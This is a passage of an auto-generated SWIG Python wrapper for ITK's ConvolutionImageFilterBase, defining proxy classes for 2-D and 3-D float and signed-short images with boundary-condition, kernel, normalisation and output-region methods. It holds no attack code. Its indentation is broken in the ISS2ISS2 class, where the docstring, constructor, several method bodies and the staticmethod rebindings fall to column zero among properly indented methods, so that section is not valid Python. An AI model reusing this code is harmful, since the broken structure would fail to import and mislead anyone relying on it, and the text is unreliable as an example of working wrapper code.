itkConvolutionImageFilterBaseIF2IF2.SetNormalize = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIF2IF2_SetNormalize, None, itkConvolutionImageFilterBaseIF2IF2)
itkConvolutionImageFilterBaseIF2IF2.GetNormalize = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIF2IF2_GetNormalize, None, itkConvolutionImageFilterBaseIF2IF2)
itkConvolutionImageFilterBaseIF2IF2.NormalizeOn = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIF2IF2_NormalizeOn, None, itkConvolutionImageFilterBaseIF2IF2)
itkConvolutionImageFilterBaseIF2IF2.NormalizeOff = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIF2IF2_NormalizeOff, None, itkConvolutionImageFilterBaseIF2IF2)
itkConvolutionImageFilterBaseIF2IF2.SetOutputRegionMode = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIF2IF2_SetOutputRegionMode, None, itkConvolutionImageFilterBaseIF2IF2)
itkConvolutionImageFilterBaseIF2IF2.GetOutputRegionMode = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIF2IF2_GetOutputRegionMode, None, itkConvolutionImageFilterBaseIF2IF2)
itkConvolutionImageFilterBaseIF2IF2.SetOutputRegionModeToSame = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIF2IF2_SetOutputRegionModeToSame, None, itkConvolutionImageFilterBaseIF2IF2)
itkConvolutionImageFilterBaseIF2IF2.SetOutputRegionModeToValid = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIF2IF2_SetOutputRegionModeToValid, None, itkConvolutionImageFilterBaseIF2IF2)
itkConvolutionImageFilterBaseIF2IF2_swigregister = _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIF2IF2_swigregister
itkConvolutionImageFilterBaseIF2IF2_swigregister(itkConvolutionImageFilterBaseIF2IF2)
def itkConvolutionImageFilterBaseIF2IF2_cast(obj: 'itkLightObject') -> "itkConvolutionImageFilterBaseIF2IF2 *":
    """itkConvolutionImageFilterBaseIF2IF2_cast(itkLightObject obj) -> itkConvolutionImageFilterBaseIF2IF2"""
    # Module-level alias of the class's static cast(): converts a generic
    # itkLightObject reference to this wrapper type.
    return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIF2IF2_cast(obj)
class itkConvolutionImageFilterBaseIF3IF3(itkImageToImageFilterAPython.itkImageToImageFilterIF3IF3):
    """Proxy of C++ itkConvolutionImageFilterBaseIF3IF3 class.

    SWIG-generated wrapper for the base of ITK convolution image filters on
    3-D float images; every method below delegates to the compiled
    _itkConvolutionImageFilterBasePython extension module.
    """
    # 'thisown' reflects whether Python owns (and may delete) the C++ object.
    thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
    def __init__(self, *args, **kwargs):
        # Direct construction is disabled; instances come from the New() factory.
        raise AttributeError("No constructor defined")
    __repr__ = _swig_repr
    def SetBoundaryCondition(self, _arg: 'itkImageBoundaryConditionIF3') -> "void":
        """SetBoundaryCondition(itkConvolutionImageFilterBaseIF3IF3 self, itkImageBoundaryConditionIF3 _arg)"""
        return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIF3IF3_SetBoundaryCondition(self, _arg)
    def GetBoundaryCondition(self) -> "itkImageBoundaryConditionIF3 *":
        """GetBoundaryCondition(itkConvolutionImageFilterBaseIF3IF3 self) -> itkImageBoundaryConditionIF3"""
        return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIF3IF3_GetBoundaryCondition(self)
    def SetKernelImage(self, _arg: 'itkImageF3') -> "void":
        """SetKernelImage(itkConvolutionImageFilterBaseIF3IF3 self, itkImageF3 _arg)"""
        return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIF3IF3_SetKernelImage(self, _arg)
    def GetKernelImage(self) -> "itkImageF3 const *":
        """GetKernelImage(itkConvolutionImageFilterBaseIF3IF3 self) -> itkImageF3"""
        return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIF3IF3_GetKernelImage(self)
    def SetNormalize(self, _arg: 'bool const') -> "void":
        """SetNormalize(itkConvolutionImageFilterBaseIF3IF3 self, bool const _arg)"""
        return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIF3IF3_SetNormalize(self, _arg)
    def GetNormalize(self) -> "bool":
        """GetNormalize(itkConvolutionImageFilterBaseIF3IF3 self) -> bool"""
        return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIF3IF3_GetNormalize(self)
    def NormalizeOn(self) -> "void":
        """NormalizeOn(itkConvolutionImageFilterBaseIF3IF3 self)"""
        return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIF3IF3_NormalizeOn(self)
    def NormalizeOff(self) -> "void":
        """NormalizeOff(itkConvolutionImageFilterBaseIF3IF3 self)"""
        return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIF3IF3_NormalizeOff(self)
    # Enum values for OutputRegionModeType (see SetOutputRegionMode below).
    SAME = _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIF3IF3_SAME
    VALID = _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIF3IF3_VALID
    def SetOutputRegionMode(self, _arg: 'itkConvolutionImageFilterBaseIF3IF3::OutputRegionModeType const') -> "void":
        """SetOutputRegionMode(itkConvolutionImageFilterBaseIF3IF3 self, itkConvolutionImageFilterBaseIF3IF3::OutputRegionModeType const _arg)"""
        return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIF3IF3_SetOutputRegionMode(self, _arg)
    def GetOutputRegionMode(self) -> "itkConvolutionImageFilterBaseIF3IF3::OutputRegionModeType":
        """GetOutputRegionMode(itkConvolutionImageFilterBaseIF3IF3 self) -> itkConvolutionImageFilterBaseIF3IF3::OutputRegionModeType"""
        return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIF3IF3_GetOutputRegionMode(self)
    def SetOutputRegionModeToSame(self) -> "void":
        """SetOutputRegionModeToSame(itkConvolutionImageFilterBaseIF3IF3 self)"""
        return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIF3IF3_SetOutputRegionModeToSame(self)
    def SetOutputRegionModeToValid(self) -> "void":
        """SetOutputRegionModeToValid(itkConvolutionImageFilterBaseIF3IF3 self)"""
        return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIF3IF3_SetOutputRegionModeToValid(self)
    # Bound C-level destructor invoked by SWIG when the proxy is collected.
    __swig_destroy__ = _itkConvolutionImageFilterBasePython.delete_itkConvolutionImageFilterBaseIF3IF3
    def cast(obj: 'itkLightObject') -> "itkConvolutionImageFilterBaseIF3IF3 *":
        """cast(itkLightObject obj) -> itkConvolutionImageFilterBaseIF3IF3"""
        return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIF3IF3_cast(obj)
    cast = staticmethod(cast)
    def New(*args, **kargs):
        """New() -> itkConvolutionImageFilterBaseIF3IF3

        Create a new object of the class itkConvolutionImageFilterBaseIF3IF3 and set the input and the parameters if some
        named or non-named arguments are passed to that method.

        New() tries to assign all the non named parameters to the input of the new objects - the
        first non named parameter in the first input, etc.

        The named parameters are used by calling the method with the same name prefixed by 'Set'.

        Ex:

          itkConvolutionImageFilterBaseIF3IF3.New( reader, Threshold=10 )

        is (most of the time) equivalent to:

          obj = itkConvolutionImageFilterBaseIF3IF3.New()
          obj.SetInput( 0, reader.GetOutput() )
          obj.SetThreshold( 10 )
        """
        # __New_orig__ is attached to this class by the swigregister call below.
        obj = itkConvolutionImageFilterBaseIF3IF3.__New_orig__()
        import itkTemplate
        itkTemplate.New(obj, *args, **kargs)
        return obj
    New = staticmethod(New)
# Rebind each proxy method as a direct instancemethod on the wrapper class
# (SWIG runtime plumbing), then register the class with the C extension.
itkConvolutionImageFilterBaseIF3IF3.SetBoundaryCondition = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIF3IF3_SetBoundaryCondition, None, itkConvolutionImageFilterBaseIF3IF3)
itkConvolutionImageFilterBaseIF3IF3.GetBoundaryCondition = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIF3IF3_GetBoundaryCondition, None, itkConvolutionImageFilterBaseIF3IF3)
itkConvolutionImageFilterBaseIF3IF3.SetKernelImage = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIF3IF3_SetKernelImage, None, itkConvolutionImageFilterBaseIF3IF3)
itkConvolutionImageFilterBaseIF3IF3.GetKernelImage = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIF3IF3_GetKernelImage, None, itkConvolutionImageFilterBaseIF3IF3)
itkConvolutionImageFilterBaseIF3IF3.SetNormalize = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIF3IF3_SetNormalize, None, itkConvolutionImageFilterBaseIF3IF3)
itkConvolutionImageFilterBaseIF3IF3.GetNormalize = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIF3IF3_GetNormalize, None, itkConvolutionImageFilterBaseIF3IF3)
itkConvolutionImageFilterBaseIF3IF3.NormalizeOn = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIF3IF3_NormalizeOn, None, itkConvolutionImageFilterBaseIF3IF3)
itkConvolutionImageFilterBaseIF3IF3.NormalizeOff = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIF3IF3_NormalizeOff, None, itkConvolutionImageFilterBaseIF3IF3)
itkConvolutionImageFilterBaseIF3IF3.SetOutputRegionMode = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIF3IF3_SetOutputRegionMode, None, itkConvolutionImageFilterBaseIF3IF3)
itkConvolutionImageFilterBaseIF3IF3.GetOutputRegionMode = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIF3IF3_GetOutputRegionMode, None, itkConvolutionImageFilterBaseIF3IF3)
itkConvolutionImageFilterBaseIF3IF3.SetOutputRegionModeToSame = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIF3IF3_SetOutputRegionModeToSame, None, itkConvolutionImageFilterBaseIF3IF3)
itkConvolutionImageFilterBaseIF3IF3.SetOutputRegionModeToValid = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIF3IF3_SetOutputRegionModeToValid, None, itkConvolutionImageFilterBaseIF3IF3)
itkConvolutionImageFilterBaseIF3IF3_swigregister = _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIF3IF3_swigregister
itkConvolutionImageFilterBaseIF3IF3_swigregister(itkConvolutionImageFilterBaseIF3IF3)
def itkConvolutionImageFilterBaseIF3IF3_cast(obj: 'itkLightObject') -> "itkConvolutionImageFilterBaseIF3IF3 *":
    """itkConvolutionImageFilterBaseIF3IF3_cast(itkLightObject obj) -> itkConvolutionImageFilterBaseIF3IF3"""
    # Module-level alias of the class's static cast(): converts a generic
    # itkLightObject reference to this wrapper type.
    return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIF3IF3_cast(obj)
class itkConvolutionImageFilterBaseISS2ISS2(itkImageToImageFilterAPython.itkImageToImageFilterISS2ISS2):
"""Proxy of C++ itkConvolutionImageFilterBaseISS2ISS2 class."""
thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
def __init__(self, *args, **kwargs):
raise AttributeError("No constructor defined")
__repr__ = _swig_repr
def SetBoundaryCondition(self, _arg: 'itkImageBoundaryConditionISS2') -> "void":
"""SetBoundaryCondition(itkConvolutionImageFilterBaseISS2ISS2 self, itkImageBoundaryConditionISS2 _arg)"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseISS2ISS2_SetBoundaryCondition(self, _arg)
def GetBoundaryCondition(self) -> "itkImageBoundaryConditionISS2 *":
"""GetBoundaryCondition(itkConvolutionImageFilterBaseISS2ISS2 self) -> itkImageBoundaryConditionISS2"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseISS2ISS2_GetBoundaryCondition(self)
def SetKernelImage(self, _arg: 'itkImageSS2') -> "void":
"""SetKernelImage(itkConvolutionImageFilterBaseISS2ISS2 self, itkImageSS2 _arg)"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseISS2ISS2_SetKernelImage(self, _arg)
def GetKernelImage(self) -> "itkImageSS2 const *":
"""GetKernelImage(itkConvolutionImageFilterBaseISS2ISS2 self) -> itkImageSS2"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseISS2ISS2_GetKernelImage(self)
def SetNormalize(self, _arg: 'bool const') -> "void":
"""SetNormalize(itkConvolutionImageFilterBaseISS2ISS2 self, bool const _arg)"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseISS2ISS2_SetNormalize(self, _arg)
def GetNormalize(self) -> "bool":
"""GetNormalize(itkConvolutionImageFilterBaseISS2ISS2 self) -> bool"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseISS2ISS2_GetNormalize(self)
def NormalizeOn(self) -> "void":
"""NormalizeOn(itkConvolutionImageFilterBaseISS2ISS2 self)"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseISS2ISS2_NormalizeOn(self)
def NormalizeOff(self) -> "void":
"""NormalizeOff(itkConvolutionImageFilterBaseISS2ISS2 self)"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseISS2ISS2_NormalizeOff(self)
SAME = _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseISS2ISS2_SAME
VALID = _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseISS2ISS2_VALID
def SetOutputRegionMode(self, _arg: 'itkConvolutionImageFilterBaseISS2ISS2::OutputRegionModeType const') -> "void":
"""SetOutputRegionMode(itkConvolutionImageFilterBaseISS2ISS2 self, itkConvolutionImageFilterBaseISS2ISS2::OutputRegionModeType const _arg)"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseISS2ISS2_SetOutputRegionMode(self, _arg)
    def GetOutputRegionMode(self) -> "itkConvolutionImageFilterBaseISS2ISS2::OutputRegionModeType":
        """GetOutputRegionMode(itkConvolutionImageFilterBaseISS2ISS2 self) -> itkConvolutionImageFilterBaseISS2ISS2::OutputRegionModeType

        Return the current output-region mode; forwards to the compiled SWIG
        extension module.
        """
        return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseISS2ISS2_GetOutputRegionMode(self)
    def SetOutputRegionModeToSame(self) -> "void":
        """SetOutputRegionModeToSame(itkConvolutionImageFilterBaseISS2ISS2 self)

        Select the SAME output-region mode; forwards to the compiled SWIG
        extension module.
        """
        return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseISS2ISS2_SetOutputRegionModeToSame(self)
    def SetOutputRegionModeToValid(self) -> "void":
        """SetOutputRegionModeToValid(itkConvolutionImageFilterBaseISS2ISS2 self)

        Select the VALID output-region mode; forwards to the compiled SWIG
        extension module.
        """
        return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseISS2ISS2_SetOutputRegionModeToValid(self)
__swig_destroy__ = _itkConvolutionImageFilterBasePython.delete_itkConvolutionImageFilterBaseISS2ISS2
    def cast(obj: 'itkLightObject') -> "itkConvolutionImageFilterBaseISS2ISS2 *":
        """cast(itkLightObject obj) -> itkConvolutionImageFilterBaseISS2ISS2

        Downcast *obj* to this proxy type; forwards to the compiled SWIG
        extension module.  Re-bound as a staticmethod immediately below.
        """
        return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseISS2ISS2_cast(obj)
cast = staticmethod(cast)
    def New(*args, **kargs):
        """New() -> itkConvolutionImageFilterBaseISS2ISS2
        Create a new object of the class itkConvolutionImageFilterBaseISS2ISS2 and set the input and the parameters if some
        named or non-named arguments are passed to that method.
        New() tries to assign all the non named parameters to the input of the new objects - the
        first non named parameter in the first input, etc.
        The named parameters are used by calling the method with the same name prefixed by 'Set'.
        Ex:
          itkConvolutionImageFilterBaseISS2ISS2.New( reader, Threshold=10 )
        is (most of the time) equivalent to:
          obj = itkConvolutionImageFilterBaseISS2ISS2.New()
          obj.SetInput( 0, reader.GetOutput() )
          obj.SetThreshold( 10 )
        """
        # __New_orig__ is the factory installed by the wrapping machinery
        # (not defined in this chunk); itkTemplate.New then applies the
        # argument-assignment protocol described in the docstring.
        obj = itkConvolutionImageFilterBaseISS2ISS2.__New_orig__()
        import itkTemplate
        itkTemplate.New(obj, *args, **kargs)
        return obj
New = staticmethod(New)
# Module-import-time patching: replace each Python-level proxy method with a
# new_instancemethod wrapper that calls the compiled C function directly,
# then register the proxy class with the SWIG runtime type system.
itkConvolutionImageFilterBaseISS2ISS2.SetBoundaryCondition = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseISS2ISS2_SetBoundaryCondition, None, itkConvolutionImageFilterBaseISS2ISS2)
itkConvolutionImageFilterBaseISS2ISS2.GetBoundaryCondition = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseISS2ISS2_GetBoundaryCondition, None, itkConvolutionImageFilterBaseISS2ISS2)
itkConvolutionImageFilterBaseISS2ISS2.SetKernelImage = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseISS2ISS2_SetKernelImage, None, itkConvolutionImageFilterBaseISS2ISS2)
itkConvolutionImageFilterBaseISS2ISS2.GetKernelImage = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseISS2ISS2_GetKernelImage, None, itkConvolutionImageFilterBaseISS2ISS2)
itkConvolutionImageFilterBaseISS2ISS2.SetNormalize = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseISS2ISS2_SetNormalize, None, itkConvolutionImageFilterBaseISS2ISS2)
itkConvolutionImageFilterBaseISS2ISS2.GetNormalize = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseISS2ISS2_GetNormalize, None, itkConvolutionImageFilterBaseISS2ISS2)
itkConvolutionImageFilterBaseISS2ISS2.NormalizeOn = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseISS2ISS2_NormalizeOn, None, itkConvolutionImageFilterBaseISS2ISS2)
itkConvolutionImageFilterBaseISS2ISS2.NormalizeOff = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseISS2ISS2_NormalizeOff, None, itkConvolutionImageFilterBaseISS2ISS2)
itkConvolutionImageFilterBaseISS2ISS2.SetOutputRegionMode = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseISS2ISS2_SetOutputRegionMode, None, itkConvolutionImageFilterBaseISS2ISS2)
itkConvolutionImageFilterBaseISS2ISS2.GetOutputRegionMode = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseISS2ISS2_GetOutputRegionMode, None, itkConvolutionImageFilterBaseISS2ISS2)
itkConvolutionImageFilterBaseISS2ISS2.SetOutputRegionModeToSame = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseISS2ISS2_SetOutputRegionModeToSame, None, itkConvolutionImageFilterBaseISS2ISS2)
itkConvolutionImageFilterBaseISS2ISS2.SetOutputRegionModeToValid = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseISS2ISS2_SetOutputRegionModeToValid, None, itkConvolutionImageFilterBaseISS2ISS2)
itkConvolutionImageFilterBaseISS2ISS2_swigregister = _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseISS2ISS2_swigregister
itkConvolutionImageFilterBaseISS2ISS2_swigregister(itkConvolutionImageFilterBaseISS2ISS2)
def itkConvolutionImageFilterBaseISS2ISS2_cast(obj: 'itkLightObject') -> "itkConvolutionImageFilterBaseISS2ISS2 *":
    """Module-level helper: downcast *obj* (an itkLightObject) to
    itkConvolutionImageFilterBaseISS2ISS2 via the compiled SWIG wrapper.
    """
    casted = _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseISS2ISS2_cast(obj)
    return casted
class itkConvolutionImageFilterBaseISS3ISS3(itkImageToImageFilterAPython.itkImageToImageFilterISS3ISS3):
    """Proxy of C++ itkConvolutionImageFilterBaseISS3ISS3 class.

    SWIG-generated wrapper: every method below forwards to the compiled
    extension module, and each one is re-bound via new_instancemethod in the
    module-level statements that follow this class body.  ISS3 presumably
    denotes Image<signed short, 3> (ITK wrapping naming convention — confirm
    against the wrapping configuration).
    """
    # SWIG ownership flag: True when the Python proxy owns the wrapped C++ object.
    thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
    def __init__(self, *args, **kwargs):
        # Direct construction is disabled; create instances with New().
        raise AttributeError("No constructor defined")
    __repr__ = _swig_repr
    def SetBoundaryCondition(self, _arg: 'itkImageBoundaryConditionISS3') -> "void":
        """SetBoundaryCondition(itkConvolutionImageFilterBaseISS3ISS3 self, itkImageBoundaryConditionISS3 _arg)"""
        return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseISS3ISS3_SetBoundaryCondition(self, _arg)
    def GetBoundaryCondition(self) -> "itkImageBoundaryConditionISS3 *":
        """GetBoundaryCondition(itkConvolutionImageFilterBaseISS3ISS3 self) -> itkImageBoundaryConditionISS3"""
        return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseISS3ISS3_GetBoundaryCondition(self)
    def SetKernelImage(self, _arg: 'itkImageSS3') -> "void":
        """SetKernelImage(itkConvolutionImageFilterBaseISS3ISS3 self, itkImageSS3 _arg)"""
        return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseISS3ISS3_SetKernelImage(self, _arg)
    def GetKernelImage(self) -> "itkImageSS3 const *":
        """GetKernelImage(itkConvolutionImageFilterBaseISS3ISS3 self) -> itkImageSS3"""
        return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseISS3ISS3_GetKernelImage(self)
    def SetNormalize(self, _arg: 'bool const') -> "void":
        """SetNormalize(itkConvolutionImageFilterBaseISS3ISS3 self, bool const _arg)"""
        return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseISS3ISS3_SetNormalize(self, _arg)
    def GetNormalize(self) -> "bool":
        """GetNormalize(itkConvolutionImageFilterBaseISS3ISS3 self) -> bool"""
        return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseISS3ISS3_GetNormalize(self)
    def NormalizeOn(self) -> "void":
        """NormalizeOn(itkConvolutionImageFilterBaseISS3ISS3 self)"""
        return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseISS3ISS3_NormalizeOn(self)
    def NormalizeOff(self) -> "void":
        """NormalizeOff(itkConvolutionImageFilterBaseISS3ISS3 self)"""
        return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseISS3ISS3_NormalizeOff(self)
    # OutputRegionModeType enum values accepted by SetOutputRegionMode.
    SAME = _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseISS3ISS3_SAME
    VALID = _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseISS3ISS3_VALID
    def SetOutputRegionMode(self, _arg: 'itkConvolutionImageFilterBaseISS3ISS3::OutputRegionModeType const') -> "void":
        """SetOutputRegionMode(itkConvolutionImageFilterBaseISS3ISS3 self, itkConvolutionImageFilterBaseISS3ISS3::OutputRegionModeType const _arg)"""
        return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseISS3ISS3_SetOutputRegionMode(self, _arg)
    def GetOutputRegionMode(self) -> "itkConvolutionImageFilterBaseISS3ISS3::OutputRegionModeType":
        """GetOutputRegionMode(itkConvolutionImageFilterBaseISS3ISS3 self) -> itkConvolutionImageFilterBaseISS3ISS3::OutputRegionModeType"""
        return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseISS3ISS3_GetOutputRegionMode(self)
    def SetOutputRegionModeToSame(self) -> "void":
        """SetOutputRegionModeToSame(itkConvolutionImageFilterBaseISS3ISS3 self)"""
        return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseISS3ISS3_SetOutputRegionModeToSame(self)
    def SetOutputRegionModeToValid(self) -> "void":
        """SetOutputRegionModeToValid(itkConvolutionImageFilterBaseISS3ISS3 self)"""
        return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseISS3ISS3_SetOutputRegionModeToValid(self)
    # Destructor hook invoked by SWIG when the proxy is deleted.
    __swig_destroy__ = _itkConvolutionImageFilterBasePython.delete_itkConvolutionImageFilterBaseISS3ISS3
    def cast(obj: 'itkLightObject') -> "itkConvolutionImageFilterBaseISS3ISS3 *":
        """cast(itkLightObject obj) -> itkConvolutionImageFilterBaseISS3ISS3"""
        return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseISS3ISS3_cast(obj)
    cast = staticmethod(cast)
    def New(*args, **kargs):
        """New() -> itkConvolutionImageFilterBaseISS3ISS3
        Create a new object of the class itkConvolutionImageFilterBaseISS3ISS3 and set the input and the parameters if some
        named or non-named arguments are passed to that method.
        New() tries to assign all the non named parameters to the input of the new objects - the
        first non named parameter in the first input, etc.
        The named parameters are used by calling the method with the same name prefixed by 'Set'.
        Ex:
          itkConvolutionImageFilterBaseISS3ISS3.New( reader, Threshold=10 )
        is (most of the time) equivalent to:
          obj = itkConvolutionImageFilterBaseISS3ISS3.New()
          obj.SetInput( 0, reader.GetOutput() )
          obj.SetThreshold( 10 )
        """
        # __New_orig__ is the factory installed by the wrapping machinery
        # (not defined in this chunk); itkTemplate.New then applies the
        # argument-assignment protocol described in the docstring.
        obj = itkConvolutionImageFilterBaseISS3ISS3.__New_orig__()
        import itkTemplate
        itkTemplate.New(obj, *args, **kargs)
        return obj
    New = staticmethod(New)
# Module-import-time patching: replace each Python-level proxy method with a
# new_instancemethod wrapper that calls the compiled C function directly,
# then register the proxy class with the SWIG runtime type system.
itkConvolutionImageFilterBaseISS3ISS3.SetBoundaryCondition = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseISS3ISS3_SetBoundaryCondition, None, itkConvolutionImageFilterBaseISS3ISS3)
itkConvolutionImageFilterBaseISS3ISS3.GetBoundaryCondition = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseISS3ISS3_GetBoundaryCondition, None, itkConvolutionImageFilterBaseISS3ISS3)
itkConvolutionImageFilterBaseISS3ISS3.SetKernelImage = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseISS3ISS3_SetKernelImage, None, itkConvolutionImageFilterBaseISS3ISS3)
itkConvolutionImageFilterBaseISS3ISS3.GetKernelImage = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseISS3ISS3_GetKernelImage, None, itkConvolutionImageFilterBaseISS3ISS3)
itkConvolutionImageFilterBaseISS3ISS3.SetNormalize = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseISS3ISS3_SetNormalize, None, itkConvolutionImageFilterBaseISS3ISS3)
itkConvolutionImageFilterBaseISS3ISS3.GetNormalize = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseISS3ISS3_GetNormalize, None, itkConvolutionImageFilterBaseISS3ISS3)
itkConvolutionImageFilterBaseISS3ISS3.NormalizeOn = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseISS3ISS3_NormalizeOn, None, itkConvolutionImageFilterBaseISS3ISS3)
itkConvolutionImageFilterBaseISS3ISS3.NormalizeOff = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseISS3ISS3_NormalizeOff, None, itkConvolutionImageFilterBaseISS3ISS3)
itkConvolutionImageFilterBaseISS3ISS3.SetOutputRegionMode = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseISS3ISS3_SetOutputRegionMode, None, itkConvolutionImageFilterBaseISS3ISS3)
itkConvolutionImageFilterBaseISS3ISS3.GetOutputRegionMode = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseISS3ISS3_GetOutputRegionMode, None, itkConvolutionImageFilterBaseISS3ISS3)
itkConvolutionImageFilterBaseISS3ISS3.SetOutputRegionModeToSame = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseISS3ISS3_SetOutputRegionModeToSame, None, itkConvolutionImageFilterBaseISS3ISS3)
itkConvolutionImageFilterBaseISS3ISS3.SetOutputRegionModeToValid = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseISS3ISS3_SetOutputRegionModeToValid, None, itkConvolutionImageFilterBaseISS3ISS3)
itkConvolutionImageFilterBaseISS3ISS3_swigregister = _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseISS3ISS3_swigregister
itkConvolutionImageFilterBaseISS3ISS3_swigregister(itkConvolutionImageFilterBaseISS3ISS3)
def itkConvolutionImageFilterBaseISS3ISS3_cast(obj: 'itkLightObject') -> "itkConvolutionImageFilterBaseISS3ISS3 *":
    """Module-level helper: downcast *obj* (an itkLightObject) to
    itkConvolutionImageFilterBaseISS3ISS3 via the compiled SWIG wrapper.
    """
    casted = _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseISS3ISS3_cast(obj)
    return casted
